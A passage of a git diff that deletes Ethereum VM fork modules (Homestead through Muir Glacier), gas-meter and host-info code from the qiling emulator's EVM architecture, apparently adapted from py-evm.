/dev/null @@ -1,18 +0,0 @@ -from ....vm.forks.frontier.constants import FRONTIER_TX_GAS_SCHEDULE -from ....constants import GAS_TXCREATE - -# -# Difficulty -# -HOMESTEAD_DIFFICULTY_ADJUSTMENT_CUTOFF = 10 - - -# -# Gas Costs and Refunds -# -GAS_CODEDEPOSIT = 200 - - -HOMESTEAD_TX_GAS_SCHEDULE = FRONTIER_TX_GAS_SCHEDULE._replace( - gas_txcreate=GAS_TXCREATE, -) \ No newline at end of file diff --git a/qiling/arch/evm/vm/forks/homestead/opcodes.py b/qiling/arch/evm/vm/forks/homestead/opcodes.py deleted file mode 100644 index 5f96e6e88..000000000 --- a/qiling/arch/evm/vm/forks/homestead/opcodes.py +++ /dev/null @@ -1,29 +0,0 @@ -import copy -from typing import Dict - -from eth_utils.toolz import merge - -from .... import constants -from ....abc import OpcodeAPI -from ....vm import mnemonics -from ....vm import opcode_values -from ....vm.logic import ( - call, -) - -from ....vm.forks.frontier.opcodes import FRONTIER_OPCODES - - -NEW_OPCODES = { - opcode_values.DELEGATECALL: call.DelegateCall.configure( - __name__='opcode:DELEGATECALL', - mnemonic=mnemonics.DELEGATECALL, - gas_cost=constants.GAS_CALL, - )(), -} - - -HOMESTEAD_OPCODES: Dict[int, OpcodeAPI] = merge( - copy.deepcopy(FRONTIER_OPCODES), - NEW_OPCODES -) diff --git a/qiling/arch/evm/vm/forks/homestead/state.py b/qiling/arch/evm/vm/forks/homestead/state.py deleted file mode 100644 index a9e1e7b8a..000000000 --- a/qiling/arch/evm/vm/forks/homestead/state.py +++ /dev/null @@ -1,23 +0,0 @@ -from typing import Type - -from ....abc import ( - ComputationAPI, -) -from ....vm.forks.frontier.state import ( - FrontierState, - FrontierTransactionExecutor, -) - -from .computation import HomesteadComputation -# from .validation import validate_homestead_transaction - - -class HomesteadState(FrontierState): - computation_class: Type[ComputationAPI] = HomesteadComputation - - # def validate_transaction(self, transaction: SignedTransactionAPI) -> None: - # validate_homestead_transaction(self, transaction) - - -class HomesteadTransactionExecutor(FrontierTransactionExecutor): - pass diff --git a/qiling/arch/evm/vm/forks/istanbul/__init__.py b/qiling/arch/evm/vm/forks/istanbul/__init__.py deleted file mode 100644 index a485b7a95..000000000 --- a/qiling/arch/evm/vm/forks/istanbul/__init__.py +++ /dev/null @@ -1,10 +0,0 @@ -from ..constantinople import ConstantinopleVM -from .state import IstanbulState - - -class IstanbulVM(ConstantinopleVM): - # fork name - fork = 'istanbul' - - # classes - _state_class = IstanbulState diff --git a/qiling/arch/evm/vm/forks/istanbul/computation.py b/qiling/arch/evm/vm/forks/istanbul/computation.py deleted file mode 100644 index e682f3fc2..000000000 --- a/qiling/arch/evm/vm/forks/istanbul/computation.py +++ /dev/null @@ -1,55 +0,0 @@ -from eth_utils.toolz import ( - merge, -) - -from .... import precompiles -from ...._utils.address import ( - force_bytes_to_address, -) -from ....vm.forks.petersburg.computation import ( - PETERSBURG_PRECOMPILES -) -from ....vm.forks.petersburg.computation import ( - PetersburgComputation, -) -from ....vm.gas_meter import ( - allow_negative_refund_strategy, - GasMeter, -) - -from .constants import ( - GAS_ECADD, - GAS_ECMUL, - GAS_ECPAIRING_BASE, - GAS_ECPAIRING_PER_POINT, -) -from .opcodes import ISTANBUL_OPCODES - -ISTANBUL_PRECOMPILES = merge( - PETERSBURG_PRECOMPILES, - { - force_bytes_to_address(b'\x06'): precompiles.ecadd(gas_cost=GAS_ECADD), - force_bytes_to_address(b'\x07'): precompiles.ecmul(gas_cost=GAS_ECMUL), - force_bytes_to_address(b'\x08'): precompiles.ecpairing( - gas_cost_base=GAS_ECPAIRING_BASE, - gas_cost_per_point=GAS_ECPAIRING_PER_POINT, - ), - force_bytes_to_address(b'\x09'): precompiles.blake2b_fcompress, - }, -) - - -class IstanbulComputation(PetersburgComputation): - """ - A class for all execution computations in the ``Istanbul`` fork. - Inherits from :class:`~eth.vm.forks.constantinople.petersburg.PetersburgComputation` - """ - # Override - opcodes = ISTANBUL_OPCODES - _precompiles = ISTANBUL_PRECOMPILES - - def get_gas_meter(self) -> GasMeter: - return GasMeter( - self.msg.gas, - allow_negative_refund_strategy - ) diff --git a/qiling/arch/evm/vm/forks/istanbul/constants.py b/qiling/arch/evm/vm/forks/istanbul/constants.py deleted file mode 100644 index cc9095df5..000000000 --- a/qiling/arch/evm/vm/forks/istanbul/constants.py +++ /dev/null @@ -1,26 +0,0 @@ -from ....vm.forks.homestead.constants import HOMESTEAD_TX_GAS_SCHEDULE - - -# -# New gas costs for some opcodes -# - -# EIP-1108: -GAS_ECADD = 150 -GAS_ECMUL = 6000 -GAS_ECPAIRING_BASE = 45_000 -GAS_ECPAIRING_PER_POINT = 34_000 - -# EIP-1884: -GAS_SLOAD_EIP1884 = 800 -GAS_BALANCE_EIP1884 = 700 -GAS_EXTCODEHASH_EIP1884 = 700 - -# New gas cost for transaction data -# EIP-2028 -GAS_TXDATANONZERO_EIP2028 = 16 - - -ISTANBUL_TX_GAS_SCHEDULE = HOMESTEAD_TX_GAS_SCHEDULE._replace( - gas_txdatanonzero=GAS_TXDATANONZERO_EIP2028, -) diff --git a/qiling/arch/evm/vm/forks/istanbul/opcodes.py b/qiling/arch/evm/vm/forks/istanbul/opcodes.py deleted file mode 100644 index 8b2fc9e1d..000000000 --- a/qiling/arch/evm/vm/forks/istanbul/opcodes.py +++ /dev/null @@ -1,70 +0,0 @@ -import copy - -from eth_utils.toolz import merge - -from .... import constants -from ....vm import ( - mnemonics, - opcode_values, -) -from ....vm.forks.byzantium.opcodes import ( - ensure_no_static -) -from ....vm.forks.petersburg.opcodes import ( - PETERSBURG_OPCODES, -) -from ....vm.forks.istanbul.constants import ( - GAS_BALANCE_EIP1884, - GAS_SLOAD_EIP1884, - GAS_EXTCODEHASH_EIP1884, -) -from ....vm.logic import ( - context, - storage, -) -from ....vm.opcode import as_opcode -from .storage import ( - sstore_eip2200, -) - - -UPDATED_OPCODES = { - # New opcodes - opcode_values.CHAINID: as_opcode( - logic_fn=context.chain_id, - mnemonic=mnemonics.CHAINID, - gas_cost=constants.GAS_BASE, - ), - opcode_values.SELFBALANCE: as_opcode( - logic_fn=context.selfbalance, - mnemonic=mnemonics.SELFBALANCE, - gas_cost=constants.GAS_LOW, - ), - - # Repriced opcodes - opcode_values.SSTORE: as_opcode( - logic_fn=ensure_no_static(sstore_eip2200), - mnemonic=mnemonics.SSTORE, - gas_cost=constants.GAS_NULL, - ), - opcode_values.BALANCE: as_opcode( - logic_fn=context.balance, - mnemonic=mnemonics.BALANCE, - gas_cost=GAS_BALANCE_EIP1884, - ), - opcode_values.SLOAD: as_opcode( - logic_fn=storage.sload, - mnemonic=mnemonics.SLOAD, - gas_cost=GAS_SLOAD_EIP1884, - ), - opcode_values.EXTCODEHASH: as_opcode( - logic_fn=context.extcodehash, - mnemonic=mnemonics.EXTCODEHASH, - gas_cost=GAS_EXTCODEHASH_EIP1884, - ), -} - -ISTANBUL_OPCODES = merge( - copy.deepcopy(PETERSBURG_OPCODES), - UPDATED_OPCODES, -) diff --git a/qiling/arch/evm/vm/forks/istanbul/state.py b/qiling/arch/evm/vm/forks/istanbul/state.py deleted file mode 100644 index 8e330cdd5..000000000 --- a/qiling/arch/evm/vm/forks/istanbul/state.py +++ /dev/null @@ -1,9 +0,0 @@ -from ....vm.forks.petersburg.state import ( - PetersburgState -) - -from .computation import IstanbulComputation - - -class IstanbulState(PetersburgState): - computation_class = IstanbulComputation diff --git a/qiling/arch/evm/vm/forks/istanbul/storage.py b/qiling/arch/evm/vm/forks/istanbul/storage.py deleted file mode 100644 index 4d5bb7869..000000000 --- a/qiling/arch/evm/vm/forks/istanbul/storage.py +++ /dev/null @@ -1,24 +0,0 @@ -from ....exceptions import OutOfGas -from ....vm.computation import BaseComputation -from ....vm.forks.constantinople.storage import ( - GAS_SCHEDULE_EIP1283, -) -from ....vm.forks.istanbul import ( - constants -) -from ....vm.logic.storage import ( - net_sstore, -) - -GAS_SCHEDULE_EIP2200 = GAS_SCHEDULE_EIP1283._replace(base=constants.GAS_SLOAD_EIP1884) - - -def sstore_eip2200(computation: BaseComputation) -> None: - gas_remaining = computation.get_gas_remaining() - if gas_remaining <= 2300: - raise OutOfGas( - "Net-metered SSTORE always fails below 2300 gas, per EIP-2200", - gas_remaining, - ) - else: - return net_sstore(GAS_SCHEDULE_EIP2200, computation) diff --git a/qiling/arch/evm/vm/forks/muir_glacier/__init__.py b/qiling/arch/evm/vm/forks/muir_glacier/__init__.py deleted file mode 100644 index 21bb0a1aa..000000000 --- a/qiling/arch/evm/vm/forks/muir_glacier/__init__.py +++ /dev/null @@ -1,10 +0,0 @@ -from ..istanbul import IstanbulVM -from .state import MuirGlacierState - - -class MuirGlacierVM(IstanbulVM): - # fork name - fork = 'muir-glacier' - - # classes - _state_class = MuirGlacierState diff --git a/qiling/arch/evm/vm/forks/muir_glacier/computation.py b/qiling/arch/evm/vm/forks/muir_glacier/computation.py deleted file mode 100644 index 802781454..000000000 --- a/qiling/arch/evm/vm/forks/muir_glacier/computation.py +++ /dev/null @@ -1,20 +0,0 @@ -from ....vm.forks.istanbul.computation import ( - ISTANBUL_PRECOMPILES -) -from ....vm.forks.istanbul.computation import ( - IstanbulComputation, -) - -from .opcodes import MUIR_GLACIER_OPCODES - -MUIR_GLACIER_PRECOMPILES = ISTANBUL_PRECOMPILES - - -class MuirGlacierComputation(IstanbulComputation): - """ - A class for all execution computations in the ``MuirGlacier`` fork. - Inherits from :class:`~eth.vm.forks.constantinople.istanbul.IstanbulComputation` - """ - # Override - opcodes = MUIR_GLACIER_OPCODES - _precompiles = MUIR_GLACIER_PRECOMPILES diff --git a/qiling/arch/evm/vm/forks/muir_glacier/opcodes.py b/qiling/arch/evm/vm/forks/muir_glacier/opcodes.py deleted file mode 100644 index 55f9afb33..000000000 --- a/qiling/arch/evm/vm/forks/muir_glacier/opcodes.py +++ /dev/null @@ -1,7 +0,0 @@ -import copy -from ....vm.forks.istanbul.opcodes import ( - ISTANBUL_OPCODES, -) - - -MUIR_GLACIER_OPCODES = copy.deepcopy(ISTANBUL_OPCODES) diff --git a/qiling/arch/evm/vm/forks/muir_glacier/state.py b/qiling/arch/evm/vm/forks/muir_glacier/state.py deleted file mode 100644 index 33e48d8d5..000000000 --- a/qiling/arch/evm/vm/forks/muir_glacier/state.py +++ /dev/null @@ -1,9 +0,0 @@ -from ....vm.forks.istanbul.state import ( - IstanbulState -) - -from .computation import MuirGlacierComputation - - -class MuirGlacierState(IstanbulState): - computation_class = MuirGlacierComputation diff --git a/qiling/arch/evm/vm/forks/petersburg/__init__.py b/qiling/arch/evm/vm/forks/petersburg/__init__.py deleted file mode 100644 index 3881fa015..000000000 --- a/qiling/arch/evm/vm/forks/petersburg/__init__.py +++ /dev/null @@ -1,39 +0,0 @@ -# from typing import ( -# Type, -# ) - -# from ....abc import ( -# StateAPI, -# BlockAPI, -# ) -from ..byzantium import ByzantiumVM -# get_uncle_reward, -# ) - -# from .blocks import PetersburgBlock -# from .constants import EIP1234_BLOCK_REWARD -# from .headers import ( -# compute_petersburg_difficulty, -# configure_petersburg_header, -# create_petersburg_header_from_parent, -# ) -from .state import PetersburgState - - -class PetersburgVM(ByzantiumVM): - # fork name - fork = 'petersburg' - - # classes - # block_class: Type[BlockAPI] = PetersburgBlock - _state_class = PetersburgState - -# # Methods -# create_header_from_parent = staticmethod(create_petersburg_header_from_parent) # type: ignore -# compute_difficulty = staticmethod(compute_petersburg_difficulty) # type: ignore -# configure_header = configure_petersburg_header -# get_uncle_reward = staticmethod(get_uncle_reward(EIP1234_BLOCK_REWARD)) - -# @staticmethod -# def get_block_reward() -> int: -# return EIP1234_BLOCK_REWARD diff --git a/qiling/arch/evm/vm/forks/petersburg/computation.py b/qiling/arch/evm/vm/forks/petersburg/computation.py deleted file mode 100644 index 1b6ac1fe2..000000000 --- a/qiling/arch/evm/vm/forks/petersburg/computation.py +++ /dev/null @@ -1,20 +0,0 @@ -from ....vm.forks.byzantium.computation import ( - BYZANTIUM_PRECOMPILES -) -from ....vm.forks.byzantium.computation import ( - ByzantiumComputation -) - -from .opcodes import PETERSBURG_OPCODES - -PETERSBURG_PRECOMPILES = BYZANTIUM_PRECOMPILES - - -class PetersburgComputation(ByzantiumComputation): - """ - A class for all execution computations in the ``Petersburg`` fork. - Inherits from :class:`~eth.vm.forks.byzantium.computation.ByzantiumComputation` - """ - # Override - opcodes = PETERSBURG_OPCODES - _precompiles = PETERSBURG_PRECOMPILES diff --git a/qiling/arch/evm/vm/forks/petersburg/constants.py b/qiling/arch/evm/vm/forks/petersburg/constants.py deleted file mode 100644 index 9eddd2353..000000000 --- a/qiling/arch/evm/vm/forks/petersburg/constants.py +++ /dev/null @@ -1,6 +0,0 @@ -from eth_utils import denoms - - -GAS_EXTCODEHASH_EIP1052 = 400 - -EIP1234_BLOCK_REWARD = 2 * denoms.ether diff --git a/qiling/arch/evm/vm/forks/petersburg/opcodes.py b/qiling/arch/evm/vm/forks/petersburg/opcodes.py deleted file mode 100644 index 080a5c71c..000000000 --- a/qiling/arch/evm/vm/forks/petersburg/opcodes.py +++ /dev/null @@ -1,63 +0,0 @@ -import copy -from typing import Dict - -from eth_utils.toolz import ( - merge -) - -from .... import ( - constants -) -from ....abc import OpcodeAPI -from ....vm import ( - mnemonics, - opcode_values, -) -from ....vm.forks.byzantium.opcodes import ( - BYZANTIUM_OPCODES, -) -from ....vm.forks.petersburg.constants import ( - GAS_EXTCODEHASH_EIP1052 -) -from ....vm.logic import ( - arithmetic, - context, - system, -) -from ....vm.opcode import ( - as_opcode -) - - -UPDATED_OPCODES = { - opcode_values.SHL: as_opcode( - logic_fn=arithmetic.shl, - mnemonic=mnemonics.SHL, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SHR: as_opcode( - logic_fn=arithmetic.shr, - mnemonic=mnemonics.SHR, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SAR: as_opcode( - logic_fn=arithmetic.sar, - mnemonic=mnemonics.SAR, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.EXTCODEHASH: as_opcode( - logic_fn=context.extcodehash, - mnemonic=mnemonics.EXTCODEHASH, - gas_cost=GAS_EXTCODEHASH_EIP1052, - ), - opcode_values.CREATE2: system.Create2.configure( - __name__='opcode:CREATE2', - mnemonic=mnemonics.CREATE2, - gas_cost=constants.GAS_CREATE, - )(), -} - -PETERSBURG_OPCODES: Dict[int, OpcodeAPI] = merge( - copy.deepcopy(BYZANTIUM_OPCODES), - UPDATED_OPCODES, -) diff --git a/qiling/arch/evm/vm/forks/petersburg/state.py b/qiling/arch/evm/vm/forks/petersburg/state.py deleted file mode 100644 index 9bd7bac61..000000000 --- a/qiling/arch/evm/vm/forks/petersburg/state.py +++ /dev/null @@ -1,9 +0,0 @@ -from ....vm.forks.byzantium.state import ( - ByzantiumState -) - -from .computation import PetersburgComputation - - -class PetersburgState(ByzantiumState): - computation_class = PetersburgComputation diff --git a/qiling/arch/evm/vm/forks/spurious_dragon/__init__.py b/qiling/arch/evm/vm/forks/spurious_dragon/__init__.py deleted file mode 100644 index e4a87f5cd..000000000 --- a/qiling/arch/evm/vm/forks/spurious_dragon/__init__.py +++ /dev/null @@ -1,20 +0,0 @@ -# from typing import Type - -# from ....abc import ( -# BlockAPI, -# StateAPI, -# ) - -from ..tangerine_whistle import TangerineWhistleVM - -# from .blocks import SpuriousDragonBlock -from .state import SpuriousDragonState - - -class SpuriousDragonVM(TangerineWhistleVM): - # fork name - fork: str = 'spurious-dragon' # noqa: E701 # flake8 bug that's fixed in 3.6.0+ - - # classes - # block_class: Type[BlockAPI] = SpuriousDragonBlock - _state_class = SpuriousDragonState diff --git a/qiling/arch/evm/vm/forks/spurious_dragon/_utils.py b/qiling/arch/evm/vm/forks/spurious_dragon/_utils.py deleted file mode 100644 index ac5c2099f..000000000 --- a/qiling/arch/evm/vm/forks/spurious_dragon/_utils.py +++ /dev/null @@ -1,60 +0,0 @@ -from typing import Iterable - -from eth_typing import Address - -from eth_utils import to_set - -from .... import constants - -from ...._utils.address import ( - force_bytes_to_address, -) - -from ....vm.computation import BaseComputation - - -THREE = force_bytes_to_address(b'\x03') - - -@to_set -def collect_touched_accounts(computation: BaseComputation, - ancestor_had_error: bool = False) -> Iterable[Address]: - """ - Collect all of the accounts that *may* need to be deleted based on - `EIP-161 `_. - - Checking whether they *do* need to be deleted happens in the caller. - - See also: https://github.com/ethereum/EIPs/issues/716 - """ - # collect the coinbase account if it was touched via zero-fee transfer - if computation.is_origin_computation and computation.transaction_context.gas_price == 0: - yield computation.state.coinbase - - # collect those explicitly marked for deletion ("beneficiary" is of SELFDESTRUCT) - for beneficiary in sorted(set(computation.accounts_to_delete.values())): - if computation.is_error or ancestor_had_error: - # Special case to account for geth+parity bug - # https://github.com/ethereum/EIPs/issues/716 - if beneficiary == THREE: - yield beneficiary - continue - else: - yield beneficiary - - # collect account directly addressed - if computation.msg.to != constants.CREATE_CONTRACT_ADDRESS: - if computation.is_error or ancestor_had_error: - # collect RIPEMD160 precompile even if ancestor computation had error; - # otherwise, skip collection from children of errored-out computations; - # if there were no special-casing for RIPEMD160, we'd simply `pass` here - if computation.msg.to == THREE: - yield computation.msg.to - else: - yield computation.msg.to - - # recurse into nested computations (even errored ones, since looking for RIPEMD160) - for child in computation.children: - yield from collect_touched_accounts( - child, - ancestor_had_error=(computation.is_error or ancestor_had_error)) diff --git a/qiling/arch/evm/vm/forks/spurious_dragon/computation.py b/qiling/arch/evm/vm/forks/spurious_dragon/computation.py deleted file mode 100644 index 502ef6e38..000000000 --- a/qiling/arch/evm/vm/forks/spurious_dragon/computation.py +++ /dev/null @@ -1,75 +0,0 @@ -from eth_hash.auto import keccak -from eth_utils import ( - encode_hex, -) - -from .... import constants -from ....abc import ( - ComputationAPI, - MessageAPI, - StateAPI, - TransactionContextAPI, -) -from ....exceptions import ( - OutOfGas, -) -from ....vm.forks.homestead.computation import ( - HomesteadComputation, -) - -from .constants import EIP170_CODE_SIZE_LIMIT -from .opcodes import SPURIOUS_DRAGON_OPCODES - - -class SpuriousDragonComputation(HomesteadComputation): - """ - A class for all execution computations in the ``SpuriousDragon`` fork. - Inherits from :class:`~eth.vm.forks.homestead.computation.HomesteadComputation` - """ - # Override - opcodes = SPURIOUS_DRAGON_OPCODES - - @classmethod - def apply_create_message( - cls, - state: StateAPI, - message: MessageAPI, - transaction_context: TransactionContextAPI) -> ComputationAPI: - - snapshot = state.snapshot() - - # EIP161 nonce incrementation - state.increment_nonce(message.storage_address) - - computation = cls.apply_message(state, message, transaction_context) - - if computation.is_error: - state.revert(snapshot) - return computation - else: - contract_code = computation.output - - if contract_code and len(contract_code) >= EIP170_CODE_SIZE_LIMIT: - computation.error = OutOfGas( - f"Contract code size exceeds EIP170 limit of {EIP170_CODE_SIZE_LIMIT}." - f" Got code of size: {len(contract_code)}" - ) - state.revert(snapshot) - elif contract_code: - contract_code_gas_cost = len(contract_code) * constants.GAS_CODEDEPOSIT - try: - computation.consume_gas( - contract_code_gas_cost, - reason="Write contract code for CREATE", - ) - except OutOfGas as err: - # Different from Frontier: reverts state on gas failure while - # writing contract code. - computation.error = err - state.revert(snapshot) - else: - state.set_code(message.storage_address, contract_code) - state.commit(snapshot) - else: - state.commit(snapshot) - return computation diff --git a/qiling/arch/evm/vm/forks/spurious_dragon/constants.py b/qiling/arch/evm/vm/forks/spurious_dragon/constants.py deleted file mode 100644 index 5e0611e9c..000000000 --- a/qiling/arch/evm/vm/forks/spurious_dragon/constants.py +++ /dev/null @@ -1,13 +0,0 @@ -# -# Gas Costs and Refunds -# -GAS_CODEDEPOSIT = 200 - - -# https://github.com/ethereum/EIPs/issues/160 -GAS_EXP_EIP160 = 10 -GAS_EXPBYTE_EIP160 = 50 - - -# https://github.com/ethereum/EIPs/issues/170 -EIP170_CODE_SIZE_LIMIT = 24577 diff --git a/qiling/arch/evm/vm/forks/spurious_dragon/opcodes.py b/qiling/arch/evm/vm/forks/spurious_dragon/opcodes.py deleted file mode 100644 index 10178a583..000000000 --- a/qiling/arch/evm/vm/forks/spurious_dragon/opcodes.py +++ /dev/null @@ -1,49 +0,0 @@ -import copy -from typing import Dict - -from eth_utils.toolz import merge - -from ....abc import OpcodeAPI -from ....vm.forks.tangerine_whistle.constants import ( - GAS_SELFDESTRUCT_EIP150, - GAS_CALL_EIP150 -) -from ....vm import mnemonics -from ....vm import opcode_values -from ....vm.forks.tangerine_whistle.opcodes import TANGERINE_WHISTLE_OPCODES -from ....vm.logic import ( - arithmetic, - system, - call, -) -from ....vm.opcode import as_opcode - -from .constants import ( - GAS_EXP_EIP160, - GAS_EXPBYTE_EIP160 -) - - -UPDATED_OPCODES = { - opcode_values.EXP: as_opcode( - logic_fn=arithmetic.exp(gas_per_byte=GAS_EXPBYTE_EIP160), - mnemonic=mnemonics.EXP, - gas_cost=GAS_EXP_EIP160, - ), - opcode_values.SELFDESTRUCT: as_opcode( - logic_fn=system.selfdestruct_eip161, - mnemonic=mnemonics.SELFDESTRUCT, - gas_cost=GAS_SELFDESTRUCT_EIP150, - ), - opcode_values.CALL: call.CallEIP161.configure( - __name__='opcode:CALL', - mnemonic=mnemonics.CALL, - gas_cost=GAS_CALL_EIP150, - )(), -} - - -SPURIOUS_DRAGON_OPCODES: Dict[int, OpcodeAPI] = merge( - copy.deepcopy(TANGERINE_WHISTLE_OPCODES), - UPDATED_OPCODES, -) diff --git a/qiling/arch/evm/vm/forks/spurious_dragon/state.py b/qiling/arch/evm/vm/forks/spurious_dragon/state.py deleted file mode 100644 index 7249d1f6a..000000000 --- a/qiling/arch/evm/vm/forks/spurious_dragon/state.py +++ /dev/null @@ -1,44 +0,0 @@ -from typing import Type - -from eth_utils import ( - encode_hex, -) - -from ....abc import ( - ComputationAPI, MessageAPI, - TransactionExecutorAPI, -) -from ....vm.forks.homestead.state import ( - HomesteadState, - HomesteadTransactionExecutor, -) - -from .computation import SpuriousDragonComputation -from ._utils import collect_touched_accounts - - -class SpuriousDragonTransactionExecutor(HomesteadTransactionExecutor): - def finalize_computation(self, - message: MessageAPI, - computation: ComputationAPI) -> ComputationAPI: - computation = super().finalize_computation(message, computation) - - # - # EIP161 state clearing - # - touched_accounts = collect_touched_accounts(computation) - - for account in touched_accounts: - should_delete = ( - self.vm_state.account_exists(account) - and self.vm_state.account_is_empty(account) - ) - if should_delete: - self.vm_state.delete_account(account) - - return computation - - -class SpuriousDragonState(HomesteadState): - computation_class: Type[ComputationAPI] = SpuriousDragonComputation - transaction_executor_class: Type[TransactionExecutorAPI] = SpuriousDragonTransactionExecutor diff --git a/qiling/arch/evm/vm/forks/tangerine_whistle/__init__.py b/qiling/arch/evm/vm/forks/tangerine_whistle/__init__.py deleted file mode 100644 index 6536fdda8..000000000 --- a/qiling/arch/evm/vm/forks/tangerine_whistle/__init__.py +++ /dev/null @@ -1,18 +0,0 @@ -# from typing import Type - -# from ....abc import StateAPI -from ..homestead import HomesteadVM - -from .state import TangerineWhistleState - - -class TangerineWhistleVM(HomesteadVM): - # fork name - fork: str = 'tangerine-whistle' # noqa - - # classes - _state_class= TangerineWhistleState - -# # Don't bother with any DAO logic in Tangerine VM or later -# # This is how we skip DAO logic on Ropsten, for example -# support_dao_fork = False diff --git a/qiling/arch/evm/vm/forks/tangerine_whistle/computation.py b/qiling/arch/evm/vm/forks/tangerine_whistle/computation.py deleted file mode 100644 index 059a3080a..000000000 --- a/qiling/arch/evm/vm/forks/tangerine_whistle/computation.py +++ /dev/null @@ -1,12 +0,0 @@ -from ..homestead.computation import HomesteadComputation - -from .opcodes import TANGERINE_WHISTLE_OPCODES - - -class TangerineWhistleComputation(HomesteadComputation): - """ - A class for all execution computations in the ``TangerineWhistle`` fork. - Inherits from :class:`~eth.vm.forks.homestead.computation.HomesteadComputation` - """ - # Override - opcodes = TANGERINE_WHISTLE_OPCODES diff --git a/qiling/arch/evm/vm/forks/tangerine_whistle/constants.py b/qiling/arch/evm/vm/forks/tangerine_whistle/constants.py deleted file mode 100644 index 3372ac53b..000000000 --- a/qiling/arch/evm/vm/forks/tangerine_whistle/constants.py +++ /dev/null @@ -1,14 +0,0 @@ -# -# EIP150 Mainnet Block -# -TANGERINE_WHISTLE_MAINNET_BLOCK = 2463000 - - -# -# Gas Costs and Refunds -# -GAS_SELFDESTRUCT_EIP150 = 5000 -GAS_CALL_EIP150 = 700 -GAS_EXTCODE_EIP150 = 700 -GAS_BALANCE_EIP150 = 400 -GAS_SLOAD_EIP150 = 200 diff --git a/qiling/arch/evm/vm/forks/tangerine_whistle/opcodes.py b/qiling/arch/evm/vm/forks/tangerine_whistle/opcodes.py deleted file mode 100644 index 624adb48f..000000000 --- a/qiling/arch/evm/vm/forks/tangerine_whistle/opcodes.py +++ /dev/null @@ -1,71 +0,0 @@ -import copy - -from eth_utils.toolz import merge - -from ....vm.forks.tangerine_whistle import constants -from ....constants import GAS_CREATE -from ....vm import opcode_values -from ....vm import mnemonics -from ....vm.forks.homestead.opcodes import HOMESTEAD_OPCODES -from ....vm.logic import ( - call, - context, - storage, - system, -) -from ....vm.opcode import as_opcode - - -UPDATED_OPCODES = { - opcode_values.EXTCODESIZE: as_opcode( - logic_fn=context.extcodesize, - mnemonic=mnemonics.EXTCODESIZE, - gas_cost=constants.GAS_EXTCODE_EIP150, - ), - opcode_values.EXTCODECOPY: as_opcode( - logic_fn=context.extcodecopy, - mnemonic=mnemonics.EXTCODECOPY, - gas_cost=constants.GAS_EXTCODE_EIP150, - ), - opcode_values.BALANCE: as_opcode( - logic_fn=context.balance, - mnemonic=mnemonics.BALANCE, - gas_cost=constants.GAS_BALANCE_EIP150, - ), - opcode_values.SLOAD: as_opcode( - logic_fn=storage.sload, - mnemonic=mnemonics.SLOAD, - gas_cost=constants.GAS_SLOAD_EIP150, - ), - opcode_values.SELFDESTRUCT: as_opcode( - logic_fn=system.selfdestruct_eip150, - mnemonic=mnemonics.SELFDESTRUCT, - gas_cost=constants.GAS_SELFDESTRUCT_EIP150, - ), - opcode_values.CREATE: system.CreateEIP150.configure( - __name__='opcode:CREATE', - mnemonic=mnemonics.CREATE, - gas_cost=GAS_CREATE, - )(), - opcode_values.CALL: call.CallEIP150.configure( - __name__='opcode:CALL', - mnemonic=mnemonics.CALL, - gas_cost=constants.GAS_CALL_EIP150, - )(), - opcode_values.CALLCODE: call.CallCodeEIP150.configure( - __name__='opcode:CALLCODE', - mnemonic=mnemonics.CALLCODE, - gas_cost=constants.GAS_CALL_EIP150, - )(), - opcode_values.DELEGATECALL: call.DelegateCallEIP150.configure( - __name__='opcode:DELEGATECALL', - mnemonic=mnemonics.DELEGATECALL, - gas_cost=constants.GAS_CALL_EIP150, - )(), -} - - -TANGERINE_WHISTLE_OPCODES = merge( - copy.deepcopy(HOMESTEAD_OPCODES), - UPDATED_OPCODES, -) diff --git a/qiling/arch/evm/vm/forks/tangerine_whistle/state.py b/qiling/arch/evm/vm/forks/tangerine_whistle/state.py deleted file mode 100644 index 75556b8ab..000000000 --- a/qiling/arch/evm/vm/forks/tangerine_whistle/state.py +++ /dev/null @@ -1,7 +0,0 @@ -from ....vm.forks.homestead.state import HomesteadState - -from .computation import TangerineWhistleComputation - - -class TangerineWhistleState(HomesteadState): - computation_class = TangerineWhistleComputation diff --git a/qiling/arch/evm/vm/gas_meter.py b/qiling/arch/evm/vm/gas_meter.py deleted file mode 100644 index a3a892e4a..000000000 --- a/qiling/arch/evm/vm/gas_meter.py +++ /dev/null @@ -1,80 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from typing import ( - Callable, -) -from eth_utils import ( - ValidationError, - get_extended_debug_logger, -) - -from ..abc import GasMeterAPI -from ..exceptions import ( - OutOfGas, -) -from ..validation import ( - validate_uint256, -) - - -def default_refund_strategy(gas_refunded_total: int, amount: int) -> int: - if amount < 0: - raise ValidationError("Gas refund amount must be positive") - - return gas_refunded_total + amount - - -def allow_negative_refund_strategy(gas_refunded_total: int, amount: int) -> int: - return gas_refunded_total + amount - - -RefundStrategy = Callable[[int, int], int] - - -class GasMeter(GasMeterAPI): - - start_gas: int = None - - gas_refunded: int = None - gas_remaining: int = None - - logger = get_extended_debug_logger('eth.gas.GasMeter') - - def __init__(self, - start_gas: int, - refund_strategy: RefundStrategy = default_refund_strategy) -> None: - validate_uint256(start_gas, title="Start Gas") - - self.refund_strategy = refund_strategy - self.start_gas = start_gas - - self.gas_remaining = self.start_gas - self.gas_refunded = 0 - - # - # Write API - # - def consume_gas(self, amount: int, reason: str) -> None: - if amount < 0: - raise ValidationError("Gas consumption amount must be positive") - - if amount > self.gas_remaining: - raise OutOfGas( - f"Out of gas: Needed {amount} " - f"- Remaining {self.gas_remaining} " - f"- Reason: {reason}" - ) - - self.gas_remaining -= amount - - def return_gas(self, amount: int) -> None: - if amount < 0: - raise ValidationError("Gas return amount must be positive") - - self.gas_remaining += amount - - def refund_gas(self, amount: int) -> None: - self.gas_refunded = self.refund_strategy(self.gas_refunded, amount) diff --git a/qiling/arch/evm/vm/host.py b/qiling/arch/evm/vm/host.py deleted file mode 100644 index b34996cfc..000000000 --- a/qiling/arch/evm/vm/host.py +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -class QlArchEVMHostInfo: - def __init__(self, coinbase, timestamp, block_number, difficulty, gas_limit, prev_hashes, chain_id) -> None: - self.coinbase = coinbase - self.timestamp = timestamp - self.block_number = block_number - self.difficulty = difficulty - self.gas_limit = gas_limit - self.prev_hashes = prev_hashes - self.chain_id = chain_id - diff --git 